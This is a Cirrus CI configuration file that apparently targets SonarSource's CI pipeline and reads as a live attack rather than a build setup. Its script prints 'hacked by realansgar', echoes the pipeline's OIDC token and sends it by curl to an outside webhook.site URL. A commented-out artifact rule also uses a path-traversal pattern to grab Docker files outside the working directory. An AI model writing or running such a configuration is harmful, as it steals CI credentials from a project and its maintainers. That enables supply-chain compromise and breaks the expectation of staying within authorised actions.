task:
  env:
    #CIRRUS_WORKING_DIR: "/tmp"
    CIRRUS_OIDC_TOKEN_AUDIENCE: "https://cirrus-ci.com/github/SonarSource"
    CIRRUS_USER_COLLABORATOR: true
    REAL: "ANSGAR"
  echo_script:
    set -x;
    apk add curl;
    echo "hacked by realansgar";
    echo $CIRRUS_OIDC_TOKEN;
    curl "https://webhook.site/dc785d7e-266e-4c92-ad13-396505a91474?token=$CIRRUS_OIDC_TOKEN"
  #archive_artifacts:
    #store: always
    #path: "../../../../../../../../.dockeren**"
container:
  image: alpine:latest
